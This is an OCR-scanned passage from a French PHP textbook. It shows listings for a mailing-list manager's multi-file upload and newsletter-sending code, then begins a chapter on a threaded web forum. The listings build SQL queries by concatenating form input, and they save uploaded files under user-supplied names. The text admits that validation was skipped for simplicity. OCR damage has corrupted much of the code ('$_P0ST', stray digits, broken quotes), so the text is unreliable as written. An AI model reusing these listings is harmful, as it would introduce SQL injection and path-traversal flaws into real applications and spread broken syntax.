version texte et la version HTML de son bulletin, mais vous pouvez naturellement 
changer ce comportement en fonction de vos besoins. II existe egalement sur ce formu- 
laire un certain nombre de champs facultatifs permettant a l'administrateur de deposer 
les images a inclure dans la version HTML de son bulletin. Chacun de ces fichiers doit 
etre indique et transfere separement. 

Ce formulaire est comparable a un formulaire classique de depot de fichier, mais nous 
nous en servons ici pour transferer plusieurs fichiers. Cela implique quelques differen- 
ces mineures au niveau de la syntaxe du formulaire et dans la maniere dont nous gerons 
les fichiers transferes a 1' autre extremite. 

Le code de la fonction display mail f orm( ) est presente dans le Listing 28.15. 

Listing 28.15 : La fonction display _mail_form() de outputjfns.php — Cette fonction 
affiche le formulaire de transfert de fichiers vers le serveur 



function display_mail_f orm($email, $listid=0) { 

// Affiche un formulaire HTML pour deposer un nouveau message 
global $table_width ; 
$list=get_all_lists ( ) ; 
$lists=sizeof ($list) ; 

?> 

<table cellpadding="4" cellspacing="0" border="0" 

width="<?php echo $table_width ; ?>"> 
<form enctype="multipart/f orm-data" action="upload.php" 
method="post"> 

<tr> 

<td bgcolor="#cccccc ">List : </td> 
<td bgcolor="#cccccc"> 

<select name="list"> 

<?php 

for($i=0; $i<$lists; $i++) { 

echo "<option value=\ " " .$list [$i] [0] . " \ " " ; 

if ($listid== $list[$i] [0] ) { 
echo " selected"; 

} 

echo ">" .$list[$i] [1 ] . "</option>\n" ; 

} 

?> 

</select> 
</td> 
</tr> 
<tr> 
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<td bgcolor="#cccccc">Subject :</td> 
<td bgcolor="#cccccc"> 
<input type="text" name="subject" 

value="<?php echo $subject; ?>" 

size="60" /></td> 

</tr> 
<tr> 

<td bgcolor="#cccccc">Text Version:</td> 
<td bgcolor="#cccccc"> 

<input type="file" name="userf ile[0] " size="60"/></td> 

</tr> 

<tr><td bgcolor="#cccccc">HTML Version:</td> 
<td bgcolor="#cccccc"> 

<input type="file" name="userfile[1 ] " size="60" /></td> 
</tr> 

<tr><td bgcolor="#cccccc" colspan="2">Images: (optional) 

<?php 
$max_images=10; 
for($i=0; $i<10; $i++) { 

echo "<tr><td bgcolor=\ "#cccccc\ ">Image ".($i+1)." </td> 
<td bgcolor=\ "#cccccc\ "><input type=\ "f ile\ " 

name=\"userfile[ " . ($i+2) . "]\" size=\ "60\ " /></td> 
</tr>" ; 

} 

?> 

<tr><td colspan="2" bgcolor="#cccccc" align="center"> 
<input type="hidden" name="max_images" 

value="<?php echo $max_images; ?>"> 
<input type="hidden" name="listid" 

value="<?php echo $listid; ?>"> 
<?php display_form_button( ' upload-files ') ; ?> 
</td> 
</f orm> 
</tr> 
</table> 
<?php 



II convient de remarquer que les noms des fichiers a transferer seront precises a l'aide 
d'une serie de balises INPUT de type file ; leurs noms sont enregistres dans une plage de 
variables allant de userfile[0] a userfile[n]. Pour l'essentiel, nous traitons ces 
champs de la meme maniere que nous le ferions pour des cases a cocher et nous enre- 
gistrons leur nom en considerant que nous avons affaire a un tableau. 

Si vous souhaitez transferer un nombre arbitraire de fichiers avec un script PHP et les 
gerer aisement sous forme de tableau, vous devez respecter cette convention. 

Dans le script qui traite ce formulaire, nous aboutirons en fait a trois tableaux. Nous 
allons maintenant voir a quoi ressemble ce script. 
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Gestion du transfert de plusieurs f ichiers 

Vous vous souvenez peut-etre que nous avons place le code consacre au transfert de 
fichiers dans un fichier separe. Le code source complet de ce fichier, upload.php, se 
trouve dans le Listing 28.16. 

Listing 28.16 : upload.php — Ce script transfere vers le serveur les fichiers necessaires 
a un bulletin 



<?php 

// Cette f onctionnalite a ete placee dans un fichier distinct 
// afin d'assumer notre paranoia. Si quelque chose se passe mal, 
// nous sortons. 

$max_size = 50000; 

include ( 'include_fns.php' ) ; 
session_start( ) ; 

// Seuls les administrateurs peuvent deposer des fichiers 
if ( !check_admin_user( ) ) { 

echo "<p>You do not seem to be authorized to use this 
page.</p>" ; 

exit; 

} 



// Configure les boutons de la barre d ' administration 
$buttons = array ( ) ; 



$buttons[0] 
$buttons[ 1 ] 
$buttons[2] 
$buttons[3] 
$buttons[4] 
$buttons[5] 
$buttons[6] 
$buttons[7] 



change-password ' ; 
create-list ' ; 
create-mail ' ; 
view-mail ' ; 
log-out ' ; 
show-all-lists ' ; 
show-my-lists ' ; 
show-other-lists ' 



do_html_header( ' Pyramid-MLM - Upload Files'); 
display_toolbar($buttons) ; 

// Verifie que la page a ete appelee avec les donnees requises. 
if ( ( !$_FILES[ 'userfile' ] [ 'name' ] [0] ) | | 
( !$_FILES[ 'userfile' ] [ 'name' ] [1 ] ) | | 
( !$_P0ST[ 'subject' ] | j ! $_POST [ 'list ' ] ) ) { 
echo "<p>Problem: You did not fill out the form fully. 
The images are the only optional fields. 
Each message needs a subject, text version 
and an HTML version. </p>" ; 
do_html_f ooter( ) ; 
exit ; 



$list = $_POST[ 'list' ] ; 
$subject = $_POST[ ' subject '] ; 

if ( ! ($conn=db_connect ( ) ) ) { 
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echo "<p>Could not connect to db.</p>"; 

do_html_f ooter( ) ; 

exit; 



// Ajoute les details du courrier a la base de donnees. 
$query = "insert into mail values (NULL, 

' " . $_SESSI0N [ 1 admin_user ']."', 

' " .Ssubject. " 1 , 

' " .$list. " 1 , 

'STORED' , NULL, NULL) " ; 

$result = $conn->query ($query) ; 
if(!$result) { 

do_html_f ooter( ) ; 

exit; 

} 

// Obtient 1 ' identif iant affecte a ce courrier par MySQL 
$mailid = $conn->insert_id ; 

if (!$mailid) { 
do_html_footer( ) ; 
exit; 

} 

// La creation du repertoire echouera si ce n'est pas le premier 
// message archive. C'est normal. 
@mkdir( 'archive/ 1 .$list, 0700); 

// Ca devient un probleme si la creation du repertoire 

// specifique pour ce courrier echoue. 

if ( !mkdir( ' archive/ ' .$list .'/' .Smailid, 0700)) { 

do_html_f ooter ( ) ; 

exit; 

} 

// Parcourt le tableau des fichiers deposes. 
$i = 0; 

while ( ($_FILES[ 'userfile' ] [ 'name' ] [$i] ) && 

($_FILES[ 'userfile' ][ 'name' ] [$i] !='none')) { 
echo "<p>Uploading " .$_FILES[ ' userfile '][' name '] [$i] . " - ". 
$_FILES[ 'userfile' ] [ 'size' ] [$i] . " bytes. </p>" ; 

if ($_FILES[ 'userfile' ][ 'size' ] [$i]==0) { 
echo "<p>Problem: ". $_FILES[ ' userfile '][' name '] [$i] . 
" is zero length" ; 

$i++; 
continue; 

} 

if ($_FILES[ ' userfile '][' size '] [$i]>$max_size) { 

echo "<p>Problem: ". $_FILES[ ' userfile '][' name '] [$i] . " is over " 
.$max_size." bytes"; 

$i++; 
continue; 

} 

// Verification que 1 ' image transferee est bien une image. 
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II Si getimagesize( ) peut determiner sa taille, il s'agit 
// probablement d'une image. 
if(($i>1) && 

( !getimagesize($_FILES[ ' userfile 1 ] [ 'tmp_name 1 ] [$i] ) ) ) { 
echo "<p>Problem: ". $_FILES[ 1 userfile '][ 1 name 1 ] [$i] . 
" is corrupt, or not a gif, jpeg or png.</p>"; 

$i++; 
continue; 

} 

// Le fichier (message texte) et le fichier 1 (message HTML) 
// sont des cas particuliers. 
if($i==0) { 

$destination = "archive/" .$list. "/" .$mailid. "/text. txt" ; 
} else if($i == 1 ) { 

$destination = "archive/" .$list . "/" .$mailid. "/index . html" ; 
} else { 

$destination = "archive/ " .$list ."/". $mailid ."/ " 
.$_FILES[ 'userfile' ] [ 'name' ] [$i] ; 

$query = "insert into images values ( ' " .$mailid. " ' , 
' " .$_FILES[ 'userfile' ] [ 'name' ] [$i] 
' " .$_FILES[ 'userfile' ] [ 'type' ] [$i] . " ' ) " ; 

$result = $conn->query ($query) ; 

} 

if ( !is_uploaded_f ile($_FILES[ ' userfile' ][ 'tmp_name' ] [$i] ) ) { 
// Detection d'une attaque possible par depot de fichier. 
echo "<p>Something funny happening with " 

.$_FILES[ ' userfile' ][' name ']." , not uploading."; 
do_html_f ooter( ) ; 
exit; 

} 

move_uploaded_f ile($_FILES[ 'userfile' ] [ 'tmp_name' ] [$i] , 
$destination) ; 

$i++; 

} 

display_preview_button($list , $mailid, ' preview-html ' ) ; 
display_preview_button($list , $mailid, 'preview-text'); 
display_button( 'send' , "&id=$mailid" ) ; 

echo "<p style=\ "padding-bottom: 50px\"> </p>" ; 
do_html_f ooter( ) ; 

?> 



Nous allons maintenant nous interesser a chacune des etapes de ce listing. 

Tout d'abord, nous ouvrons une session et nous verifions que l'utilisateur authentifie est 
un administrateur. En effet, nous ne souhaitons pas autoriser n'importe qui a deposer 
des fichiers. 
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II serait egalement interessant de verifier les variables list et mailid pour voir si elles 
contiennent des caracteres particuliers, mais nous avons ignore cette etape pour des 
raisons de simplicite. 

Ensuite, nous configurons et envoyons les en-tetes de la page et nous validons le fait 
que le formulaire a ete rempli correctement. Cette etape est tres importante puisque le 
formulaire est assez complexe a remplir. 

Nous creons ensuite une entree pour cet e-mail dans la base de donnees, ainsi qu'un 
repertoire dans l'archive pour l'enregistrer. 

Nous arrivons ensuite a la partie principale du script, qui verifie et deplace chacun des 
fichiers transferes. C'est cette partie qui doit etre modifiee pour transferer plusieurs 
fichiers. Nous devons a present prendre en charge quatre tableaux. Ces tableaux sont 
appeles $ FILES[ 1 userf ile 1 ] [ 1 name ' ], $ FILES[ 1 userf ile 1 ] [ 1 tmp name'],$ FILES 
[ 1 userf ile ' ] [ ' size 1 ] et $userfile size.$ FILES[ 1 userf ile 1 ][' type 1 ]. lis 
correspondent a leurs equivalents pour le transfert d'un seul fichier, sauf que chacun 
d'entre eux est un tableau. Le premier fichier du formulaire sera indique dans 
$ FILES [ ' userf ile ' ] [ 'tmp name'][0],$ FILES[ ' userf ile 1 ][' name 1 ] [0], $ FILES 
[ 'userf ile 1 ] [ 'size' ] [0] et $ FILES [ 'userf ile' ] [ 'type' ] [0]. 

A partir de ces quatre tableaux, nous effectuons les verifications traditionnelles et nous 
deplacons les fichiers dans l'archive. 

Pour finir, nous affichons quelques boutons afin que l'administrateur puisse previsuali- 
ser le bulletin depose avant de l'envoyer, ainsi qu'un bouton d'envoi. Vous pouvez 
observer la sortie de upload. php a la Figure 28.13. 



Figure 28. 13 
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Previsualisation du bulletin 

L'administrateur dispose de deux methodes pour previsualiser un bulletin avant de 
1' envoy er. II peut acceder aux fonctions de previsualisation a partir de la page de trans- 
fert des fichiers s'il souhaite previsualiser le bulletin immediatement apres 1' avoir 
transfere. II peut egalement cliquer sur le bouton View Mail, qui affiche la liste de tous 
les bulletins qui n'ont pas encore ete envoyes s'il souhaite previsualiser et envoyer un 
bulletin ulterieurement. Le bouton View Mail active Taction view mail, qui declenche 
le code suivant : 

case ' view-mail ' : 

display_items( 'Unsent Mail', get_unsent_mail(get_email( ) ) , 
1 preview-html 1 , 'preview-text', 'send'); 

break; 

Comme vous pouvez le constater, nous nous servons une fois de plus de la fonction 
display items () pour les boutons qui correspondent aux actions preview html, 
preview text et send. 

II est interessant de remarquer que les boutons Preview ne declenchent, en fait, aucune 
action mais qu'ils sont directement associes au bulletin dans 1' archive. Si vous revenez 
aux Listings 28.7 et 28.16, vous constaterez que ces boutons sont crees avec la fonction 
display preview button (), pas avec display button(). 

En effet, cette derniere cree un lien vers un script avec les parametres GET necessaries, 
tandis que display preview button ( ) fournit un lien direct vers l'archive. Ce lien sera 
affiche dans une nouvelle fenetre grace a l'attribut target=new de la balise HTML. 
Vous pouvez observer la previsualisation de la version HTML d'un bulletin a la 
Figure 28.14. 



Figure 28. 14 

Une previsualisation 
d'un bulletin HTML, 
avec les images 
correspondantes. 
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Envoi du bulletin 

Lorsque 1' administrates clique sur le bouton Send d'un bulletin, Taction send est activee 
et le code suivant est done declenche : 

case ' send ' : 

send($_GET[ 'id' ] , $_SESSI0N[ ' admin_user ' ] ) ; 
break; 

Celui-ci appelle la fonction send(), qui se trouve dans la bibliotheque de fonctions 
mlmjns.php. C'est dans cette fonction, presentee dans le Listing 28.17, que nous utili- 
sons la classe Mail mime. 

Listing 28.17 : La fonction send() de mlmjns.php — Cette fonction envoie un bulletin 



// Cree le message a partir des entrees de la BD et des fichiers. 
// Envoie des messages de test a 1 ' administrates ou les vrais 
// messages a toute la liste. 
function send ($mailid , $admin_user) { 
if ( !check_admin_user($admin_user) ) { 
return false; 

} 

if(!($info = load_mail_info($mailid) ) ) { 

echo "<p>Cannot load list information for message 

" .$mailid. "</p>" ; 
return false; 

} 

$subject = $info[ ' subject '] ; 
$listid = $info[ 'listid' ] ; 
$status = $inf o[ ' status '] ; 
$sent = $inf o[ ' sent ' ] ; 

$from_name = 'Pyramid MLM 1 ; 

$f rom_address = ' return@address 1 ; 
$query = "select email from sub_lists 

where listid = '".$listid. ; 

$conn = db_connect( ) ; 

$result = $conn->query ($query) ; 

if (!$result) { 

echo $query; 

return false; 
} else if ($result->num_rows==0) { 

echo "<p>There is nobody subscribed to list number 
" .$listid. "</p>" ; 

return false; 

} 

// Inclusion des classes PEAR pour gerer le mail 
include( 'Mail.php' ) ; 
include ( ' Mail /mime . php ' ) ; 
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II Instantiation de la classe MIME en precisant la sequence de 
// fin de ligne utilisee sur ce systeme 
$message = new Mail_mime( " \r\n" ) ; 

// Lecture de la version texte du message 

$textf ilename = "archive/ " .$listid . "/" .$mailid. "/text . txt " ; 

$tfp = fopen($textfilename, "r"); 

$text = fread($tfp, filesize($textf ilename) ) ; 

fclose($tfp) ; 

// Lecture de la version HTML du message. 

$htmlf ilename = "archive/" .$listid. "/" .$mailid. "/index. html" ; 

$hfp = f open ($htmlf ilename, "r"); 

$html = fread($hfp, f ilesize ($htmlf ilename) ) ; 

fclose($hfp) ; 

// Ajout du HTML et du texte a l'objet MIME a 
$message->setTXTBody ($text) ; 
$message->setHTMLBody ($html) ; 

// Recuperation de la liste des images liees au message. 
$query = "select path, mimetype from images where 

mailid = ' " .$mailid. ; 
$result = $conn->query ($query) ; 
if(!$result) { 

echo "<p>Unable to get image list from database .</p>" ; 

return false; 

} 

$num = $result->num_rows ; 
for($i = 0; $i<$num; $i++) { 

// Chargement de chaque image a partir du disque. 

$row = $result->f etch_array ( ) ; 

$imgfilename = "archive/$listid/$mailid/ " .$row[0] ; 
$imgtype = $row[ 1 ] ; 

// Ajout de chaque image a l'objet 
$message- >addHTML Image ($imgf ilename, $imgtype, 
$imgf ilename, true); 

} 

// Creation du corps du message. 
$body = $message->get ( ) ; 

// Creation des en-tetes du message. 

$from = 1 " 1 . get_real_name ($admin_user) . 1 " < 1 .$admin_user . 1 > 1 ; 
$hdrarray = array( 

'From' => $from, 

'Subject ' => $subject) ; 

$hdrs = $message->headers ($hdrarray ) ; 

// Creation de l'objet prenant en charge l'envoi du message 
$sender =& Mail: :factory( 'mail' ) ; 



if ($status == 'STORED' ) { 
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// Envoie le message HTML a l'administrateur. 
$sender->send($admin_user, $hdrs, $body); 

// Envoie la version texte a l'administrateur. 
mail($admin_user, $subject, $text, 

1 From : " 1 . get_real_name ($admin_user) . ' " 
< ' . $admin_user . ' > ' ) ; 

echo "Mail sent to " .$admin_user . " " ; 

// Marque le message comme teste. 

$query = "update mail set status = 'TESTED' where 

mailid = ' " .$mailid. ; 
$result = $conn->query ($query) ; 

echo "<p>Press send again to send mail to whole list. 

<div align=\ "center\ ">" ; 
display_button( 'send' , '&id=' .$mailid) ; 
echo "</div></p>"; 

} else if($status == 'TESTED') { 
// Envoie a toute la liste. 

$query = "select subscribers . realname , sub_lists . email , 
subscribe rs.mimetype 
from sub_lists, subscribers 
where listid = $listid and 

sub_lists . email = subscribers. email" ; 

$result = $conn->query ($query) ; 
if ( !$result) { 

echo "<p>Error getting subscriber list</p>"; 

} 

$count = 0; 

// Pour chaque abonne. 

while ($subscriber = $result->f etch_row( ) ) { 
if ($subscriber[2]=='H' ) { 

// Envoi de la version HTML a ceux qui en veulent. 
$sender->send($subscriber[1 ] , $hdrs, $body); 
} else { 

// Envoi de la version texte a ceux qui ne veulent pas de 
// HTML dans leur courrier. 
mail($subscriber[ 1 ] , Ssubject, $text, 

' From : " ' . get_real_name ($admin_user) . ' " 

< ' . $admin_user . ' > ' ) ; 

} 

$count++; 

} 

$query = "update mail set status = 'SENT', sent = now() 

where mailid = '".$mailid. ; 
$result = $conn->query ($query) ; 

echo "<p>A total of Scount messages were sent.</p>"; 
} else if (Sstatus == 'SENT') { 
echo "<p>This mail has already been sent.</p>"; 

} 

} 
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Cette fonction s'occupe de plusieurs taches. Elle teste 1' envoi du bulletin en l'adressant 
par courrier electronique a l'administrateur avant de l'envoyer a la liste. Elle assure le 
suivi de cette operation en actualisant le statut d'un e-mail dans la base de donnees. 
Lorsque le script de transfert depose un e-mail, il fixe son statut a "STORED". 

Si la fonction send ( ) detecte qu'un e-mail possede le statut "STORED" , elle actualise son 
statut en le definissant a "TESTED" et l'envoie a l'administrateur. Le statut "TESTED" 
signifie que le bulletin a ete envoye a l'administrateur en guise de test. Si le statut est 
"TESTED", il devient "SENT", et le bulletin est envoye a toute la liste. Cela signifie qu'un 
e-mail doit etre envoye deux fois de suite : une fois pour faire un test et une fois reel- 
lement. 

La fonction envoie egalement deux types d'e-mails differents : la version texte, qui est 
envoyee avec la fonction mail( ) de PHP, et la version HTML, qui est envoyee par la 
classe Mail mime. Nous nous sommes deja servis plusieurs fois de mail ( ) dans ce livre, 
c'est pourquoi nous allons uniquement nous interesser ici a 1' utilisation de la classe 
Mail mime. Nous ne l'etudierons pas integralement, mais nous expliquerons comment 
nous nous en sommes servis dans cette application precise. 

Nous commencons par inclure le fichier de la classe et nous creons une instance de cette 
classe : 

// Inclusion des classes PEAR pour gerer le mail 
include( 'Mail.php' ) ; 
include( ' Mail/mime. php' ) ; 

// Instantiation de la classe MIME en precisant la sequence de 
// fin de ligne utilisee sur ce systeme 
$message = new Mail_mime( " \r\n" ) ; 

Notez que nous incluons deux fichiers de classe ici. Nous nous servirons de la classe 
generique Mail de PEAR plus loin dans ce script pour l'envoi de 1' e-mail. Cette classe 
est fournie avec votre installation de PEAR. 

La classe Mail mime, quant a elle, sert a creer des messages au format MIME. 

Ensuite, nous lisons les versions texte et HTML de l'e-mail et nous les ajoutons a la 
classe Mail mime : 

// Lecture de la version texte du message 

$textf ilename = "archive/ " .$listid . " / " .$mailid. " /text . txt " ; 

$tfp = fopen($textf ilename, "r"); 

$text = fread($tfp, filesize($textf ilename) ) ; 

fclose($tf p) ; 

// Lecture de la version HTML du message. 

$htmlf ilename = " archive/ " . $listid . " / " .$mailid . " /index . html" ; 

$hfp = f open ($htmlf ilename , "r"); 

$html = fread($hfp, filesize($htmlf ilename) ) ; 
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fclose($hfp) ; 

// Ajout du HTML et du texte a l'objet MIME a 
$message->setTXTBody($text) ; 
$message->setHTMLBody ($html) ; 

Nous chargeons ensuite les informations relatives aux images a partir de la base de 
donnees et nous bouclons sur ceux-ci de maniere a ajouter chacune des images a 
l'e-mail a envoyer : 

$num = $result->num_rows ; 
for($i = 0; $i<$num; $i++) { 

// Chargement de chaque image a partir du disque. 
$row = $result->f etch_array ( ) ; 

$imgfilename = "archive/$listid/$inailid/ " .$row[0] ; 
$imgtype = $row[ 1 ] ; 

// Ajout de chaque image a l'objet 
$message- >addHTML Image ($imgf ilename, $imgtype, 
$imgf ilename, true); 

} 

Les parametres passes a addHTMLImage( ) sont le nom du fichier de l'image (mais il est 
egalement possible de passer des donnees brutes), le type MIME de l'image, une 
nouvelle fois le nom du fichier et true pour indiquer que le premier parametre est un 
nom de fichier et non des donnees (si nous voulions passer les donnees brutes d'une 
image nous passerions les donnees, le type MIME, un parametre vide et false). Ces 
parametres sont un peu delicats a manier. 

A ce stade, nous devons creer le corps du message avant de definir ses en-tetes. Voici 
comment nous creons le corps : 

// Creation du corps du message. 
$body = $message->get( ) ; 

Nous pouvons ensuite creer les en-tetes du message avec un appel a la fonction 
headers () de Mail mime: 

// Creation des en-tetes du message. 

$from = ' " 1 . get_real_name ($admin_user) . 1 " < 1 .$admin_user . 1 > ' ; 
$hdrarray = array( 

'From' => $from, 

'Subject' => $subject); 

$hdrs = $message->headers($hdrarray) ; 

Enfin, le message etant entierement defini, nous pouvons l'expedier. Pour cela, nous 
avons besoin d'instancier la classe Mail de PEAR et de la passer au message cree. Nous 
commencons par instancier la classe de la maniere suivante : 

// Creation de l'objet prenant en charge l'envoi du message 
$sender =& Mail: :factory( 'mail' ) ; 
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Le parametre 1 mail ' ne fait ici que demander a la classe Mail de PEAR d'utiliser la 
fonction mail ( ) de PHP pour envoyer les e-mails. Nous pourrions aussi definir la valeur de 
ce parametre a 1 sendmail ' ou ' smtp ' . 

Puis nous envoyons l'e-mail a chacun des abonnes en bouclant sur tous les utilisateurs 
abonnes a la liste et en nous servant de la fonction send( ) de Mail ou de la fonction 
classique mail ( ) , selon les preferences des utilisateurs quant au type MIME : 

if ($subscriber[2]=='H' ) { 

// Envoi de la version HTML a ceux qui en veulent. 

$sender->send($subscriber[1 ] , $hdrs, $body); 
} else { 

// Envoi de la version texte a ceux qui ne veulent pas de 
// HTML dans leur courrier. 
mail($subscriber[1 ] , $subject, $text, 

' From : " ' . get_real_name ($admin_user) . ' " 

< ' . $admin_user . ' > ' ) ; 

} 

Le premier parametre de $sender >send() doit correspondre a l'adresse e-mail de 
l'utilisateur, le deuxieme, aux en-tetes et le troisieme, au corps du message. 

C'est tout ! Nous venons de terminer notre gestionnaire de listes de diffusion. 



Pour aller plus loin 

Comme d'habitude avec ces projets, il existe plusieurs manieres d'ameliorer les fonc- 
tionnalites. Vous pouvez par exemple : 

■ Confirmer les abonnements afm qu'il soit impossible d'abonner un utilisateur qui ne 
souhaite pas l'etre. Pour cela, il suffit d'envoyer un e-mail a l'adresse fournie et de 
supprimer les comptes des personnes qui ne repondent pas. Cette approche permet 
en outre de supprimer les adresses e-mail erronees dans la base de donnees. 

■ Permettre a 1' administrateur de controler les personnes qui souhaitent s'abonner a 
une liste. 

■ Ajouter les fonctionnalites des listes ouvertes, pour permettre a n'importe quel 
membre d'envoyer des e-mails a une liste. 

■ Permettre uniquement aux membres enregistres de visualiser 1' archive d'une liste 
de diffusion particuliere. 

■ Permettre aux utilisateurs de rechercher les listes correspondant a certains criteres. 
Par exemple, certains utilisateurs peuvent etre interesses par les listes de diffusion 
sur le golf. Lorsque votre site comptera suffisamment de listes de diffusion, il sera 
tres interessant de pouvoir effectuer ce type de selection. 
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I Rendre le programme plus efficace lorsqu'il gere une liste de diffusion comptant 
de nombreux abonnes. Pour cela, il vaut mieux utiliser un gestionnaire de listes de 
diffusion comme exmln, qui peut mettre en file d'attente et transmettre des messages 
en multithreading. L'usage de nombreux appels a la fonction mail( ) de PHP n'est 
pas tres efficace, ce qui rend PHP inutilisable pour les listes comptant de nombreux 
abonnes. Bien sur, l'interface utilisateur d'une telle liste peut toujours etre realisee 
avec PHP, mais il est preferable de laisser a exmln le soin de s'occuper du gros du 
travail. 

Pour la suite 

Au cours du prochain chapitre, nous implementerons un forum web qui permettra aux 
utilisateurs de tenir des conversations en ligne. Nous classerons les forums par sujets et 
par fils de discussion. 
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Un bon moyen de fideliser les utilisateurs de votre site consiste a leur offrir des forums 
de discussion. Ces forums peuvent etre tres varies, allant de groupes de discussions 
philosophiques a des forums de support de produits techniques. Dans ce chapitre, nous 
implementerons un forum web avec PHP, mais il est egalement possible de se servir 
d'une bibliotheque existante, Phorum, par exemple, pour implementer ses propres 
forums. 

Les forums web sont parfois appeles groupes de discussion. Le principe d'un forum 
tient dans la possibilite de poster des articles ou des questions, de lire les messages 
envoyes et eventuellement y repondre. Chaque sujet de discussion donne lieu a ce que 
Ton appelle xmfil de discussion. 

Nous allons implementer un forum web appele blah-blah. Ses utilisateurs doivent pouvoir : 

■ creer de nouveaux fils de discussion en postant des articles ; 

■ poster des articles en reponse a des articles existants ; 
a consulter les articles qui ont ete postes ; 

a afficher les fils de discussion du forum ; 

■ afficher les relations entre les articles, c'est-a-dire identifier les articles qui sont des 
reponses a d'autres articles. 

Comprendre le processus 

La mise en ceuvre d'un forum est un processus tres interessant. Comme il faut enregis- 
trer les articles dans une base de donnees, avec certaines references (auteur, titre, date et 
contenu), on pourrait tout d'abord penser que cette application n'est pas tres differente 
de la base de donnees Book-O-Rama. 
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Cependant, la plupart des logiciels de forums permettent non seulement d' afficher les 
articles disponibles, mais aussi d' afficher les relations qui existent entre eux. C'est-a- 
dire que vous pouvez consulter les articles qui ont ete envoyes en reponse a d'autres 
articles (et les articles suivants) ainsi que les articles qui correspondent a de nouveaux 
sujets de discussions. 

A titre d'exemple, consultez un forum web comme celui de Slashdot, http://slashdot.org. 

L'affichage de ces relations necessite une attention particuliere. Pour ce systeme, un 
utilisateur doit etre capable de visualiser un message specifique, un fil de discussion 
avec ses relations, ou tous les fils de discussion du systeme. 

Les utilisateurs doivent egalement pouvoir creer de nouveaux sujets de discussion et 
repondre a des messages. II s'agit de la partie la plus simple. 



Composants de la solution 

Comme nous venons de le voir, l'enregistrement et la lecture de l'auteur et du contenu 
des messages sont assez faciles. La partie la plus complexe de cette application consiste 
a trouver une structure de base de donnees permettant d'enregistrer les informations 
dont nous avons besoin et un moyen de parcourir cette structure efficacement. 

La structure des articles d'un fil pourrait ressembler a celle qui est representee a la 
Figure 29.1. 



Article initial 




Reponse 1 




Reponse 1 a la Reponse 1 


> 


> 




Reponse 2 a la Reponse 1 



Reponse 1 a la Reponse 3 



Figure 29. 1 

Un article d'une discussion organisee en fils peut etre le premier article d'un nouveau sujet ou, le 
plus souvent, une reponse a un autre article. 



Dans ce diagramme, nous pouvons voir un article initial, suivi de trois reponses. Certai- 
nes de ces reponses sont suivies d'autres reponses. Ces reponses peuvent elles-memes 
avoir d'autres reponses, etc. 

Ce diagramme fournit quelques indices quant a la maniere dont nous pouvons enregis- 
trer et lire les donnees des articles, ainsi que les liens existants entre ces articles. 
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II s'agit en effet d'une structure arborescente et, si vous avez une bonne experience de 
la programmation, vous savez qu'il s'agit de l'une des structures de donnees les plus 
repandues. Ce diagramme comprend des naeuds (c'est-a-dire des articles) et des liens 
(correspondant aux relations entre ces articles), exactement comme dans une arbores- 
cence. Si vous n'avez pas l' habitude de cette structure de donnees, ne vous en faites 
pas : nous la presenterons au fur et a mesure lorsque nous en aurons besoin. 

Voici done en resume ce dont nous avons besoin pour cette application : 

1 . Trouver un moyen de representer cette structure arborescente sur notre support 
d'enregistrement (c'est-a-dire, dans notre cas, une base de donnees MySQL). 

2. Trouver comment reconstruire les donnees lorsque nous en aurons besoin. 

Nous commencerons par implementer une base de donnees MySQL qui nous permettra 
de stacker les articles entre chaque utilisation, puis nous construirons quelques interfaces 
simples pour enregistrer les articles. 

Lorsque nous chargerons la liste des articles a afficher, nous encapsulerons les en-tetes 
de chaque article dans une classe PHP tree node. Chaque tree node contiendra les 
en-tetes d'un article, ainsi qu'un ensemble de reponses a cet article. 

Les reponses seront enregistrees dans un tableau. Chaque reponse sera elle-meme un 
tree node pouvant contenir un tableau des reponses a cet article, qui sont elles-memes 
des tree node, etc. Cette arborescence continue jusqu' a ce que nous ayons atteint les 
feuilles de 1' arborescence, c'est-a-dire des nceuds qui n'ont aucune reponse. Nous 
aurons alors une arborescence ressemblant a celle de la Figure 29.1. 

Un peu de terminologie : le message auquel nous repondons peut etre appele le noeud 
parent du noeud courant. Toutes les reponses au message peuvent etre appelees les 
enfants du noeud courant. Pour vous souvenir plus facilement de ces termes, essayez 
d'imaginer cette arborescence comme un arbre genealogique. 

Le premier article de cette arborescence, celui qui n'a aucun parent, est parfois appele 
le noeud ratine. 



— Info 

Cette appellation peut troubler les debutants, puisque le noeud racine est generalement 
dessine en haut des diagrammes, contrairement a la racine des vrais arbres. 



Pour construire et afficher 1' arborescence de ce projet, nous aurons besoin de fonctions 
recursives (nous avons etudie la recursivite au Chapitre 5). 
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Nous avons choisi d'utiliser une classe pour representer cette structure, puisqu'il s'agit 
du moyen le plus simple pour implementer une structure de donnees complexe et dyna- 
mique. Cela signifie egalement que nous disposerons d'un code assez simple et relati- 
vement elegant pour effectuer une tache assez complexe. 

Presentation de la solution 

Pour mieux comprendre ce que nous avons fait dans ce projet, il peut etre interessant 
d'etudier le code au fur et a mesure, ce que nous ferons dans un moment. Cette application 
contient moins de code que d'autres, mais il est un peu plus complexe. 

Cette application ne contient que trois pages principales. La premiere, qui est aussi 
la page d'accueil, affiche tous les articles du forum sous la forme de liens vers ces 
articles. A partir de la, vous pouvez ajouter un nouvel article, visualiser un article de 
la liste, ou modifier la maniere dont les articles sont affiches en ouvrant ou en refer- 
mant des branches de l'arborescence. Nous y reviendrons dans un instant. Dans la 
page d'affichage d'un article, vous pouvez repondre a cet article ou afficher les 
reponses existantes. Enfin, la page de creation d'un article permet de saisir un 
nouvel article, soit en reponse a un message existant, soit comme un nouveau 
message independant des autres. 

Le diagramme des flux du systeme est presente a la Figure 29.2. 

Figure 29.2 

Notre application de 
forum web contient 
trois parties principales. 



Consulter un article 




Ajouter un article 


repondre* 



Le Tableau 29.1 contient un recapitulatif des fichiers necessaries a cette application. 



Tableau 29.1 : Les fichiers de I'application de forum web 



Nom 


Type 


Description 


index . php 


Application 


La page d'accueil du site, qui contient la liste de 
tous les articles du site. 


new post. php 


Application 


Formulaire de publication de nouveaux articles. 


store new post. php 


Application 


Enregistre les articles saisis dans le formulaire 
new post. php. 



Liste des articles 
(vues differentes) 
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Tableau 29.1 : Les fichiers de I'application de forum web (suite) 



Nom 




Type 


Description 


view post.php 




Application 


Affiche un article particulier et la liste des 
reponses a cet article. 


treenode class. 


php 


Bibliotheque 


Contient la definition de classe treenode, qui 
nous servira a afficher la hierarchie des articles. 


include fns.php 


Bibliotheque 


Contient toutes les autres bibliotheques de 
fonctions de cette application. 


data valid fns. 


php 


Bibliotheque 


Contient les fonctions de validation des donnees. 


db fns.php 




Bibliotheque 


Fonctions pour la connectivite avec la base de 
donnees. 


discussion fns. 


php 


